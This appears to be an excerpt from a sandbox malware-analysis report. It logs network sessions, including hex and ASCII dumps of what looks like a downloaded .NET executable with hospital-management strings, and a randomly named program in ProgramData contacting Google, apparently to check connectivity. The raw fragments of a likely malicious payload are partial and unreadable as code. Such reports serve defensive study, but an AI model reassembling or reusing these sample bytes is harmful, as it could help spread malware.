2021-10-16 14:53:40 UTC	6637	IN	Data Raw: 1d ab 7c 18 c9 b3 e2 ae ed 18 d1 56 8d 16 ff 64 f8 a1 ea 3b 0c aa c6 29 c6 ab fd 5f 73 26 fd 06 ba d7 73 77 b9 23 94 fa 9c d8 c9 f9 fd d1 1b 82 36 cf 3f 02 f6 a7 b1 30 c0 8d 1b bd ee ca 35 c6 88 3f fa f4 20 d1 9a 34 31 bb 89 1a b3 ee 18 d5 e0 34 a8 7c 66 2f 39 e4 3c d3 66 cd e5 d3 fb 44 b4 4d 4d 9c 99 ea 13 35 17 84 0e 63 1d fa 58 ee bd e1 3f 21 8b 09 e0 31 3a 59 61 48 73 f1 99 38 c9 1d f9 36 d8 67 9a 3e e4 17 50 ae 50 2d 8f f6 38 ce 26 2d e7 23 e1 57 a3 98 f3 4a 90 52 ee 10 c8 11 37 58 a9 1c 76 72 de 64 c4 35 a1 60 1b 50 aa c9 6e b5 1a 82 c1 a9 22 0c 43 75 f7 58 56 ed d8 c6 34 65 7f 17 2d 06 a3 a8 f4 29 cf 80 1d 15 12 85 41 69 12 00 56 ed da 62 65 f2 99 bd f0 12 7f ba 85 d0 c8 cf bf 12 e6 38 59 d6 c2 96 4b 92 51 9f 69 cd 6e c0 07 5f 5e 74 6c af 08 11 49 Data Ascii: \|Vd;)_s&sw#6?05? 414\|f/9<fDMM5cX?!1:YaHs86g>PP-8&-#WJR7Xvrd5`Pn"CuXV4e-)AiVbe8YKQin_^tlI
2021-10-16 14:53:40 UTC	6641	IN	Data Raw: ee a0 a1 34 8d 1c 3f 8b 62 66 4e e7 a7 96 46 f8 58 f6 e4 02 07 64 34 6b fb 96 97 18 b2 fd 4c bd b8 b7 b2 62 00 fc 90 c4 1b b6 8a 09 00 b6 54 e8 25 c8 1c 89 88 2e 8e 9e 3c 4d dd 78 9d ad 19 cb b4 7b 87 67 cb 1e 0a f9 1e a2 7c b2 14 42 77 12 6d ec c1 46 2d 7b 76 ee c8 3f 0e 66 ab 8c 8e 9c 2b 15 a2 6d 08 00 96 54 ff b8 9f 58 62 ee 86 00 56 68 9e 55 27 e1 0b ca 07 3b 77 ad 80 93 37 d8 df 5a c9 3c fb 48 7b 3d d6 fd 02 5f 43 ed 17 7e 69 98 d3 90 85 89 65 09 6a 99 81 aa 09 14 c2 30 5c 13 18 88 ec 42 60 7d 7b eb 25 5e 3f 90 a3 79 3c 17 67 c7 83 6a 3f 9a e3 1f 21 3a 9c 8f ad 66 f7 f7 a5 c8 4a c0 32 13 31 2b ae 3b 7a 6b 58 cb d5 71 d1 4a 95 8e d1 c5 88 f0 78 5f 69 8c ed d1 81 23 58 76 bb 39 cb 3d d7 3b e9 10 08 3f b8 b6 c7 45 df 87 79 6d 34 df fe 35 e7 3b b9 b2 e8 Data Ascii: 4?bfNFXd4kLbT%.<Mx{g\|BwmF-{v?f+mTXbVhU';w7Z<H{=_C~iej0\B`}{%^?y<gj?!:fJ21+;zkXqJx_i#Xv9=;?Eym45;
2021-10-16 14:53:40 UTC	6657	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6669	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 bb 52 45 89 6d ed 76 9d 02 1c 0c 9b d6 75 22 39 c7 92 56 d2 a6 22 55 1b 5a 81 67 0a 83 6b 75 f9 dd fe 87 16 19 98 46 c9 90 f3 fc f8 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 27 20 Data Ascii: REmvu"9V"UZgkuF'
2021-10-16 14:53:40 UTC	6685	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	6701	IN	Data Raw: 46 cb 39 34 67 63 67 72 6a f6 05 06 b5 e3 78 0d 46 28 08 40 bc 89 a1 8e 3a 35 2c 64 c7 23 e2 17 ba 82 e3 49 56 0f 8b d6 45 b8 0f ca 0f a0 41 a1 17 5d 97 4d 84 ef 84 d7 e4 64 7a d6 cc 92 ae c2 62 20 06 64 2a 90 7b 98 e3 5d 3d 8e 9e 3c 84 37 9d cb 87 c5 bc 19 91 2c 0d c4 26 9b f1 37 7d 46 33 65 d4 05 77 48 1f 50 23 53 4f bc 50 d8 e3 8d aa d2 58 ac 1f 58 a8 f4 55 a0 fa 1e 84 73 9c c0 1f ce 02 aa 30 14 8f a4 35 26 2c 31 a8 2f 25 6a 70 f7 4a 95 ce c1 9e ba 6f ab 07 72 1b 98 4e 28 a4 39 94 fc b6 a9 b6 1d 8c 12 2c 57 b2 1d 46 7d ac 37 17 6a 4d 4d 25 1b 92 9e ff b9 c3 df 11 32 69 00 0a 2d 53 6f 7d 63 2d 0a f1 2e 8e ad 25 67 9e 92 97 d2 34 92 75 e4 ed 51 ab 10 c8 5d a3 4c 46 52 54 51 57 85 3a a8 87 0f b8 52 01 0b 77 e5 1c 0e 78 03 df cd 45 49 a5 b2 4a 15 34 5b 99 Data Ascii: F94gcgrjxF(@:5,d#IVEA]Mdzb d*{]=<7,&7}F3ewHP#SOPXXUs05&,1/%jpJorN(9,WF}7jMM%2i-So}c-.%g4uQ]LFRTQW:RwxEIJ4[
2021-10-16 14:53:43 UTC	6717	IN	Data Raw: 29 45 89 08 ae 2f 57 ae e2 8f c7 94 2d 16 84 bc 96 3b 2c 85 06 8d 02 78 89 bf 49 81 01 42 7c 1f 0f 09 90 41 52 15 c4 bf fe a0 cb 8e b1 73 a1 4b c3 e8 f2 ed 3a c5 b0 ad 0f a8 6d 1f 42 0a c4 ae 8a ee f6 81 f7 da 36 3d 0f c8 56 8f f6 75 17 dd 8b d0 58 53 04 2c 83 f4 75 87 d8 2a af 19 5c 1d 2c 08 2e f2 03 cf e5 5d c6 f7 05 42 78 96 43 21 14 b4 0f 65 eb a4 b2 6a ce 4e 14 77 a2 d0 36 58 91 b2 c3 4d aa dd eb dc 76 7a b2 41 6d 4f af 6d 01 73 3f 96 71 5c 76 15 b6 01 c8 db 41 7b 01 97 69 eb c0 a2 2f 75 67 46 2d 36 e0 6b e9 76 bf 78 1e e8 e4 6a 10 4a 13 9e 3f 96 c9 bd 06 41 94 5f 97 8d f9 bd 42 d2 9c 37 0f de 11 07 f1 bc b6 ea ff 83 03 6a 11 c5 32 d2 9d c9 53 96 93 5a cd 8c 38 db 41 84 a8 16 71 fc df 6f f5 9e e1 8b 63 54 5d c3 f0 cb 9b fc 56 d1 f0 88 cb ff 14 60 de Data Ascii: )E/W-;,xIB\|ARsK:mB6=VuXS,u*\,.]BxC!ejNw6XMvzAmOms?q\vA{i/ugF-6kvxjJ?A_B7j2SZ8AqocT]V`
2021-10-16 14:53:43 UTC	6733	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:43 UTC	6749	IN	Data Raw: 81 21 c9 2c d9 c2 c9 7b 8d bc 29 44 e0 59 6e ff 3b 52 7a 59 4c 60 cc 21 4d 98 1d 03 ac 25 00 93 56 0e 34 23 5a 21 2f df 08 8d 8e 1a db 56 23 48 1e d9 d0 c5 5f 7d ea 4a 66 b5 a8 c4 a9 be 2f d0 6c 13 38 95 b4 4a b4 08 ab 98 e5 d1 46 47 87 06 6e a8 91 77 46 51 10 be 95 02 2e b7 54 b9 35 ed 17 37 8d 85 64 d8 28 3a 52 c3 c7 26 d8 24 b2 5a d1 bc c6 23 e3 ea 3d 4c 6b bb 9a f0 78 e1 5b 9c ef 30 ed d4 ee b1 c5 07 81 2b 82 35 f4 d7 89 ac fd de fe 71 7c 92 53 c8 25 d5 16 e1 28 59 90 c8 0c 45 26 10 fc 1c 8f 27 aa 6d fa 7b 75 27 64 82 50 73 86 68 45 f2 25 6f 61 c1 5b 52 8d f0 7d 31 28 40 a0 09 c1 94 29 cf c8 5e 44 73 50 9a ca 6b 58 b1 6d 12 81 29 02 1a 9b 7f 0d e7 bb 20 b5 d6 ca cb e2 fe 6a 32 a7 fc 0b 08 1c e5 9c e9 18 72 03 fe 64 f7 fc 55 e7 a4 9d 54 ce 69 a6 7e 91 Data Ascii: !,{)DYn;RzYL`!M%V4#Z!/V#H_}Jf/l8JFGnwFQ.T57d(:R&$Z#=Lkx[0+5q\|S%(YE&'m{u'dPshE%oa[R}1(@)^DsPkXm) j2rdUTi~
2021-10-16 14:53:43 UTC	6765	IN	Data Raw: 04 4b 6c 1f 87 a2 5b 7d ac b0 0f 02 99 58 94 5f 48 38 39 e5 6d f9 c3 6f 7a b6 bb 08 ec 3b ab fb 9a 4f 54 ee 4c bd 29 70 37 d7 39 17 6f 6e b7 bc b3 ad cc a7 64 8b 17 e9 26 48 5d 1e f9 c5 cd 0f 85 89 a5 e2 21 50 23 70 d6 92 d0 1b 89 df a6 cd 97 0f 48 59 c3 31 60 ee 23 74 3e 0b b3 0a eb 3e d6 da 92 8d ad a1 74 b8 a1 44 13 c9 76 99 60 f4 d5 7c 4e 6b 27 02 04 1b 9b 6e dd e5 c9 7b 51 d2 8b 07 60 3a 0d 8d 52 97 06 d6 eb 1e 25 d3 9f 70 48 ef 0c fb 1e 51 28 ef d6 4a 65 0e e4 76 7a 37 1d b5 5c 8d 52 2c 4a 44 3c a0 09 00 e3 f3 0e a1 4a 48 ca 65 88 82 70 40 38 22 7e 43 4e f2 fc d5 9e 11 a5 7e 59 79 13 e2 7f 01 3a 04 c9 7c bd df e4 ab d6 ab f6 5e e9 63 9c a3 28 d1 77 7e 2a 13 47 e9 77 18 0c eb 7d 2b ce bc 77 65 79 7d 08 b9 84 25 ec 1d d2 9b e6 91 91 69 15 eb 48 69 75 Data Ascii: Kl[}X_H89moz;OTL)p79ond&H]!P#pHY1`#t>>tDv`\|Nk'n{Q`:R%pHQ(Jevz7\R,JD<JHep@8"~CN~Yy:\|^c(w~*Gw}+wey}%iHiu
2021-10-16 14:53:43 UTC	6781	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 35 23 8c c6 eb 90 ff 04 56 e9 46 e5 8d 2b a1 99 9d 8e b0 35 03 d6 d7 7c 77 13 6b 61 d9 b7 bc f9 c6 bb d4 98 83 09 4e f2 2f 3e fd f1 81 37 f3 d5 d8 a6 47 34 7e 5f 35 38 96 f2 2f 3e 62 f8 e0 a1 8e 2d 86 be b3 06 d9 68 63 23 7c 84 71 37 9b 7d fe 7b 59 55 ae 21 1c ef a9 0e 20 04 71 f3 45 4c e5 db 6e e6 d9 f2 0b 53 b5 d3 05 1b 87 ec 45 c1 18 c1 f0 7d 97 e1 83 95 89 fe 17 d2 c4 ba 56 7a e4 35 da a1 68 a4 bf 0c c2 6d 0d c2 8c 5d 36 b2 1b 2c 2b 6b 47 7e 50 15 c9 1a ba 7d 8e cd 9f 5b a1 cb 74 9c 21 b3 84 21 0c e7 64 d2 f6 2c 4b 04 89 d1 a1 55 b8 68 1f c7 9a e6 63 89 73 32 34 90 c3 47 69 63 51 b1 30 6b 93 ea f4 b7 75 9f 7e 53 17 fb 58 e7 5a 1b Data Ascii: w5#VF+5\|wkaN/>7G4~_58/>b-hc#\|q7}{YU! qELnSE}Vz5hm]6,+kG~P}[t!!d,KUhcs24GicQ0ku~SXZ
2021-10-16 14:53:43 UTC	6797	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:43 UTC	6813	IN	Data Raw: 64 aa 77 d4 cb 82 6a 40 0e 42 96 27 77 3d 2c 32 b3 10 d5 b1 8a 1d 05 3c c3 41 fe ad 31 64 ea a9 6a 8b 43 de 23 60 6c f1 c1 bd 86 3d 77 69 fc 93 f7 9d eb 20 da 3e 33 de 19 bc d1 50 09 73 b5 7e cf 41 ef 28 ab fa 6d 84 b0 46 e2 95 4c 7c 72 5d 75 30 b2 0b 55 8f a8 0a c2 9e 15 23 24 d8 9e 78 fb 7e 90 02 b7 c0 82 dd 3d f8 32 6f 87 2e 9c ce 37 a1 ed cc f7 40 55 93 bf 4e 29 99 f3 cf 56 a1 e5 eb a7 19 cc 3c 34 29 85 be 78 31 6d 7a 9c c3 cf 96 43 08 ea a9 a2 d3 ae 67 8c c7 dd 69 96 33 2f f9 87 87 50 c5 1d 44 06 86 4c 3d cf 9f 73 31 c8 c3 0b cf 63 2f 9e 23 14 aa d2 3f 7a c7 38 92 d8 87 41 15 9c 94 21 1b 89 1c 0f 1d 2f 3b 8b f9 82 80 20 fb 2e 3f 0a 16 20 86 27 c9 99 a8 0b 98 d0 11 0e 0b c4 04 2f c0 31 44 31 4c 02 4f a6 25 da 35 65 77 53 71 80 7a 11 44 46 a0 57 5b 2a Data Ascii: dwj@B'w=,2<A1djC#`l=wi >3Ps~A(mFL\|r]u0U#$x~=2o.7@UN)V<4)x1mzCgi3/PDL=s1c/#?z8A!/; .? '/1D1LO%5ewSqzDFW[*
2021-10-16 14:53:43 UTC	6829	IN	Data Raw: 6c fa 26 3a e6 21 6a 13 7c cc 6c 53 99 95 c1 30 ff 17 d4 1a 1f 07 18 69 6b 1e b1 57 35 6c 61 90 49 07 f8 ce d3 21 56 33 86 b6 f5 0e 5a 73 3c 4e 09 29 96 04 05 d5 09 2d 2a 44 52 37 3f 78 d1 d0 4a 47 63 98 04 18 1a 43 7a 04 4c 97 bd 65 6d 2e bc a1 74 66 73 8a 99 be f4 3a d1 2d db 00 17 45 db b1 0a a3 75 02 0c f0 f0 25 95 fc 8c f9 c6 d6 fb de 26 ae 3d d8 28 96 0f ee 0d 99 b4 76 61 c4 29 17 58 b3 27 91 96 38 6c 59 da 2d 64 21 fc 9b f2 7b f7 27 d3 40 a4 ea 56 e2 ac 29 b0 40 08 d7 c4 9a 0c 04 aa fe bb 80 05 18 4f a5 e5 e1 45 9b 04 f7 ea ac 76 a4 12 96 62 6a ae 53 56 2b 93 b6 3e 4b 11 44 18 11 28 43 ed b6 81 ac fc 32 7c 21 1c 2d 74 40 bb 40 8f 7f 74 04 86 ed 56 20 81 51 60 05 22 31 75 91 1d 10 dc e8 00 cb 74 24 25 8d 3f 8c 5b 56 73 ae 69 8d c7 68 79 51 49 89 c3 Data Ascii: l&:!j\|lS0ikW5laI!V3Zs<N)-*DR7?xJGcCzLem.tfs:-Eu%&=(va)X'8lY-d!{'@V)@OEvbjSV+>KD(C2\|!-t@@tV Q`"1ut$%?[VsihyQI
2021-10-16 14:53:43 UTC	6845	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:43 UTC	6861	IN	Data Raw: 34 1e ec ae 1b cf 55 ad 17 01 48 4b 58 96 c1 8a ac bf 88 48 e3 2a 7f f3 21 9f b3 ad de 25 e3 20 36 c8 85 56 5d 68 5b 32 02 fc db ca 27 fc 26 c4 86 87 60 b6 ca a2 12 df 7b 43 21 19 85 f0 85 23 30 af 4d 52 18 b2 a5 9b 88 d1 b2 48 4a 6d 36 ee 20 b4 26 0f a5 5e f5 a0 f7 c0 52 9d a1 ed 5b 25 31 f8 82 b5 3b b2 42 1b aa cc c6 83 be 74 d9 bb 08 04 fa 57 e2 6e dc 1e 83 85 e6 68 5a 88 9e b0 6c 28 8d 43 51 fb a2 aa de b2 b8 53 09 0d 0f 00 00 00 00 1c e5 8a 0e 42 6a e8 87 d1 a9 dc 36 16 2d 0d 39 75 52 63 d2 c3 ca 63 2b 30 8a d1 19 c9 0e 26 bf fa 88 1b 1e 24 f6 68 eb dd 54 48 0a 70 fa 69 ff 1d ce 10 a0 3c 8c 02 43 6e 77 69 63 0e 62 f5 c8 e4 b1 12 65 04 f0 ae 10 fa 46 70 c0 41 92 3f d8 a5 51 6a 3e c4 81 73 f3 68 9c 97 d5 d0 f6 ed 1f 05 ec c3 c5 e1 03 a2 73 4f 0c 58 15 Data Ascii: 4UHKXH*!% 6V]h[2'&`{C!#0MRHJm6 &^R[%1;BtWnhZl(CQSBj6-9uRcc+0&$hTHpi<CnwicbeFpA?Qj>shsOX
2021-10-16 14:53:43 UTC	6877	IN	Data Raw: 66 35 c0 6b b4 1d a0 ec 25 26 78 a9 a7 e2 33 c8 ba b6 b3 63 19 42 11 98 e3 03 d8 cd 1a 97 04 67 76 10 05 f4 fe 29 02 a4 50 49 72 93 68 e1 02 6b 67 e4 16 73 d7 0e b8 16 51 47 1e ed 30 69 e7 b6 7f 0e c1 e0 3e bc 90 94 db 51 21 41 9d 16 77 be 55 2c 96 de 0c 48 cc 6e 9e 7e 74 d3 04 bf 45 27 24 9a 45 ba 1d a0 24 f0 f1 5b e0 dd bc d6 20 51 41 b0 1a 0f 8e 37 14 7b 14 04 9d 3a 5e 13 e4 7b 52 6b 2a 01 d3 78 ba 82 d5 07 f0 df b3 ce 31 69 d0 62 ab f2 d2 e4 19 9e dd cf a8 61 56 f6 37 30 07 4e 6f 82 41 90 52 7d b3 ba cb 35 9b 2b b2 69 f4 f9 94 82 3e 5f 8e 8f d2 3c ea c5 90 6d 52 5e 7a 45 c2 7c fc ec e7 a2 71 30 4d fe b0 92 c7 ee dd 93 d8 40 90 81 26 32 93 fe 68 f6 f4 44 2e 66 6a 40 1b ae 35 73 3f be 2f ec 18 94 14 e0 f5 f5 3a 94 0e 10 66 e8 b9 55 90 0e e7 21 8c f1 39 Data Ascii: f5k%&x3cBgv)PIrhkgsQG0i>Q!AwU,Hn~tE'$E$[ QA7{:^{Rk*x1ibaV70NoAR}5+i>_<mR^zE\|q0M@&2hD.fj@5s?/:fU!9
2021-10-16 14:53:43 UTC	6893	IN	Data Raw: 7f 02 01 00 2c 03 7f 02 01 00 0b 1b fd 02 01 00 c8 2a 56 03 03 00 e1 21 f9 02 03 00 c8 2a 77 02 03 00 04 13 7b 02 03 00 3c 17 7b 02 03 00 1d 22 04 03 03 00 bb 17 04 03 03 00 d2 2f 7f 02 03 00 00 23 7f 02 03 00 9e 12 7f 02 03 00 50 28 7f 02 03 00 ed 13 7f 02 03 00 57 19 7f 02 03 00 a7 0f 7b 02 03 00 29 1a f5 02 03 00 1b 1c 7b 02 03 00 69 24 7b 02 03 00 17 28 f5 02 03 00 48 14 7f 02 03 00 3c 18 fd 02 01 00 47 30 74 02 01 00 16 1d f9 02 01 00 e7 1a 7f 02 01 00 9c 21 7f 02 01 00 1c 1f 7f 02 01 00 2f 2f 7f 02 01 00 9b 2d 7f 02 01 00 57 2f 7f 02 01 00 b8 2e 7b 02 01 00 a7 27 7b 02 01 00 b6 22 f5 02 01 00 c8 2a 94 03 01 00 47 30 74 02 01 00 e4 22 7f 02 01 00 1c 1f 7f 02 01 00 2f 2f 7f 02 01 00 57 2f 7f 02 01 00 95 23 d3 03 03 00 ba 26 f9 02 03 00 05 11 77 02 03 Data Ascii: ,V!w{<{"/#P(W{){i${(H<G0t!//-W/.{'{"*G0t"//W/#&w
2021-10-16 14:53:43 UTC	6909	IN	Data Raw: 01 00 11 06 00 00 01 00 45 0d 00 00 01 00 cf 13 00 00 01 00 c9 0f 00 00 01 00 7e 18 00 00 02 00 f1 0f 00 00 01 00 a9 0f 00 00 02 00 17 11 00 00 01 00 74 31 00 00 01 00 ef 04 00 00 02 00 f4 14 00 00 01 00 aa 0d 00 00 02 00 7f 24 00 00 01 00 11 23 00 00 02 00 71 05 00 00 01 00 15 00 00 00 02 00 96 0d 00 00 01 00 88 00 00 00 02 00 e3 03 00 00 01 00 c4 18 00 00 01 00 8e 17 00 00 02 00 0f 0c 00 00 03 00 a0 11 00 00 04 00 35 24 00 00 01 00 e1 0d 00 00 02 00 87 11 00 00 01 00 3a 1a 00 00 02 00 f5 0a 00 00 01 00 ad 01 00 00 02 00 5c 13 00 00 01 00 f5 12 00 00 02 00 af 09 00 00 01 00 01 00 00 00 02 00 10 00 00 00 01 00 19 0c 00 00 01 00 3f 1a 00 00 01 00 75 24 00 00 01 00 17 16 00 00 01 00 24 08 00 00 01 00 1c 24 00 00 01 00 a0 0d 00 00 01 00 e7 2f 00 00 01 00 fc Data Ascii: E~t1$#q5$:\?u$$$/
2021-10-16 14:53:43 UTC	6925	IN	Data Raw: 6e 00 53 71 6c 43 6f 6e 6e 65 63 74 69 6f 6e 00 5f 45 78 63 65 70 74 69 6f 6e 00 49 6e 76 61 6c 69 64 4f 70 65 72 61 74 69 6f 6e 45 78 63 65 70 74 69 6f 6e 00 41 72 67 75 6d 65 6e 74 45 78 63 65 70 74 69 6f 6e 00 53 79 73 74 65 6d 2e 44 61 74 61 2e 43 6f 6d 6d 6f 6e 00 54 6f 67 67 6c 65 42 75 74 74 6f 6e 00 52 61 64 69 6f 42 75 74 74 6f 6e 00 4d 65 73 73 61 67 65 42 6f 78 42 75 74 74 6f 6e 00 52 6d 30 6f 00 5a 6a 33 6f 00 50 65 34 6f 00 4b 6a 35 6f 00 4d 73 35 6f 00 4c 6e 37 6f 00 43 63 38 6f 00 4e 66 39 6f 00 5f 74 78 74 42 65 64 4e 6f 00 5f 63 62 6f 61 64 6d 69 73 73 69 6f 6e 4e 6f 00 5f 74 78 74 61 64 6d 69 73 73 69 6f 4e 6f 00 5f 63 62 6f 44 69 61 67 6e 6f 73 69 73 4e 6f 00 4d 65 74 68 6f 64 49 6e 66 6f 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 67 65 74 Data Ascii: nSqlConnection_ExceptionInvalidOperationExceptionArgumentExceptionSystem.Data.CommonToggleButtonRadioButtonMessageBoxButtonRm0oZj3oPe4oKj5oMs5oLn7oCc8oNf9o_txtBedNo_cboadmissionNo_txtadmissioNo_cboDiagnosisNoMethodInfoCultureInfoget

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49755	142.250.203.100	443	C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-16 14:53:58 UTC	6937	OUT	GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive
2021-10-16 14:53:59 UTC	6937	IN	HTTP/1.1 200 OK Date: Sat, 16 Oct 2021 14:53:59 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: CONSENT=PENDING+942; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-16 14:53:59 UTC	6937	IN	Data Raw: 34 65 39 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 66 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c Data Ascii: 4e95<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="fr"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><
